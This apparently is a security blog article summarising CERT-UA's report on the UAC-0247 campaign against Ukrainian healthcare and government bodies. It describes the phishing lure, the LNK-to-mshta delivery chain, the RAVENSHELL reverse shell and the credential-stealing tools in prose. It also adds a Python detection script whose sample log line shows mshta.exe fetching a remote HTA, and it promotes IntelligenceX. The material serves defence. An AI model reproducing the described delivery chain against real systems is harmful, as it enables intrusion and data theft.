Abhay Negi

UAC-0247 Campaign Targets Ukrainian Healthcare and Government Systems with Data-Stealing Malware

Ukraine’s national cybersecurity authority, CERT-UA, has uncovered a new cyber campaign aimed at government bodies and healthcare institutions, particularly clinics and emergency medical services. The operation, tracked as UAC-0247, focuses on deploying malware capable of extracting sensitive data from Chromium-based browsers as well as WhatsApp environments.

The activity was observed between March and April 2026, and while the exact origin of the threat group remains unclear, the level of sophistication suggests a well-organized and persistent actor. The campaign highlights how attackers are increasingly combining social engineering with multi-stage malware delivery techniques to compromise critical infrastructure.

Initial Access Through Social Engineering

The attack chain begins with carefully crafted phishing emails. These messages are disguised as humanitarian aid proposals, a theme likely chosen to exploit the ongoing geopolitical situation and increase the likelihood of engagement. Recipients are encouraged to click on embedded links, which redirect them to either compromised legitimate websites or attacker-controlled pages generated using artificial intelligence tools.

In cases involving legitimate websites, attackers exploit cross-site scripting vulnerabilities to inject malicious content. In other instances, entirely fake websites are created to mimic trusted entities. Regardless of the method, the objective remains the same: convince the user to download and execute a malicious file.

Execution Chain and Malware Deployment

Once the victim interacts with the malicious page, they are prompted to download a Windows shortcut (LNK) file. This file acts as the initial execution trigger. When opened, it leverages the native Windows utility “mshta.exe” to run a remote HTML Application (HTA).

The HTA file serves a dual purpose. On the surface, it displays a decoy form to distract the user and maintain the illusion of legitimacy. In the background, however, it initiates the download of a secondary payload. This payload injects shellcode into legitimate system processes such as RuntimeBroker.exe, allowing the malware to operate under the cover of a trusted process name.

CERT-UA also noted the use of a more advanced two-stage loader in some cases. The second stage is implemented using a custom executable format, complete with structured code sections and support for dynamic library imports. The final payload is both compressed and encrypted, making detection and analysis more difficult.

Remote Access and Command Execution

A key component of the attack is the deployment of a reverse shell utility known as RAVENSHELL. This tool establishes a TCP connection with a command-and-control server, enabling attackers to execute commands remotely using standard system utilities like cmd.exe.

Additional malware components include AGINGFLY and a PowerShell-based script referred to as SILENTLOOP. AGINGFLY, developed in C#, provides extensive control over compromised systems. It communicates with its command server via WebSockets and supports a wide range of actions, including command execution, keylogging, file downloads, and deployment of additional payloads.

SILENTLOOP enhances persistence and adaptability by dynamically retrieving command-and-control server addresses from Telegram channels. It also includes fallback mechanisms to ensure continued communication even if primary channels are disrupted.

Data Theft and Post-Exploitation Activity

Investigations into multiple incidents linked to this campaign reveal that the attackers focus heavily on reconnaissance and lateral movement within compromised networks. Their ultimate goal is to extract sensitive information, particularly credentials and communication data.

To achieve this, the attackers deploy a variety of tools. These include utilities designed to bypass browser encryption mechanisms and extract stored credentials from Chromium-based applications. They also use forensic tools capable of decrypting WhatsApp Web data, allowing them to access private communications.

Additional tools observed in the campaign support network scanning, tunneling, and even cryptocurrency mining. This combination of capabilities suggests that the attackers are not only interested in espionage but may also be exploring financial gain as part of their operations.

There is also evidence indicating that members of Ukraine’s defense sector may have been targeted. In these cases, malicious archives were distributed through messaging platforms, further expanding the reach of the campaign.

Detection Challenges and Defensive Strategies

The complexity of this campaign makes it particularly difficult to detect. The use of legitimate system tools, encrypted payloads, and multi-stage loaders allows the malware to evade traditional security measures.

This is where platforms like IntelligenceX can provide significant value. By offering visibility into exposed infrastructure, malicious domains, and threat actor activity, IntelligenceX enables organizations to identify indicators of compromise earlier in the attack lifecycle.

For example, security teams can use IntelligenceX to track suspicious domains associated with phishing campaigns, monitor infrastructure linked to command-and-control servers, and correlate threat intelligence across multiple sources. This level of visibility is critical when dealing with advanced campaigns that rely on stealth and persistence.

Mitigation Recommendations

To reduce the risk posed by such attacks, CERT-UA recommends restricting the execution of potentially dangerous file types, including LNK, HTA, and JavaScript files. Additionally, limiting the use of built-in Windows utilities like mshta.exe, PowerShell, and wscript.exe can help prevent attackers from abusing these tools.
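As an added detection example (not part of the article or of CERT-UA's advisory), the Python script below applies the chain described above to constructed process-creation events: it flags mshta.exe fetching a remote HTA, a script host started from explorer.exe (how an opened LNK typically surfaces in process telemetry), and cmd.exe spawned by RuntimeBroker.exe, the process the campaign injects into. The Sysmon-style field names, rule names and the placeholder domain are assumptions for this example.

```python
import json
import re

# Heuristics modelled on the chain described above (LNK -> mshta.exe fetching a
# remote HTA -> shellcode in RuntimeBroker.exe -> cmd.exe for the RAVENSHELL
# reverse shell). Rules and field names are this example's assumptions, not CERT-UA's.
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
LOLBINS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
# RuntimeBroker.exe never legitimately spawns a shell; the campaign injects into it.
NO_SHELL_PARENTS = {"runtimebroker.exe"}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev: dict) -> list:
    """Return the names of every rule that fires for one process-creation event."""
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmdline = ev.get("CommandLine", "")
    hits = []
    if image == "mshta.exe" and REMOTE_URL.search(cmdline):
        hits.append("mshta_remote_hta")          # HTA pulled from a URL, as in the LNK stage
    if image in LOLBINS and parent == "explorer.exe":
        hits.append("lolbin_from_explorer")      # script host started by a user double-click
    if image == "cmd.exe" and parent in NO_SHELL_PARENTS:
        hits.append("shell_from_injected_host")  # command execution from the injected process
    return hits


def scan(lines) -> list:
    """Parse JSON-lines process events and return (RecordId, rule) pairs."""
    findings = []
    for line in lines:
        ev = json.loads(line)
        findings.extend((ev["RecordId"], rule) for rule in check_event(ev))
    return findings


# Constructed Sysmon-style events, not real telemetry; the domain is a placeholder.
SAMPLE_LOG = [
    r'{"RecordId": 1, "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "mshta.exe https://aid-proposal.example/form.hta"}',
    r'{"RecordId": 2, "Image": "C:\\Windows\\System32\\RuntimeBroker.exe", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "RuntimeBroker.exe -Embedding"}',
    r'{"RecordId": 3, "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\System32\\RuntimeBroker.exe", "CommandLine": "cmd.exe"}',
    r'{"RecordId": 4, "Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe notes.txt"}',
]
```

Running `scan(SAMPLE_LOG)` reports records 1 and 3 only; the benign RuntimeBroker.exe start and the notepad.exe launch produce no findings, which is the property a rule set like this must keep to remain usable on a busy endpoint fleet.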

Organizations should also invest in continuous monitoring, user awareness training, and threat intelligence integration to improve their overall security posture.

Conclusion

The UAC-0247 campaign underscores the evolving nature of cyber threats targeting critical infrastructure. By combining social engineering, advanced malware techniques, and legitimate system tools, attackers are able to operate with a high degree of stealth and effectiveness.

In this environment, proactive defense strategies and enhanced visibility are essential. Leveraging platforms like IntelligenceX, alongside strong internal security practices, can help organizations detect and respond to threats before they escalate into full-scale incidents.
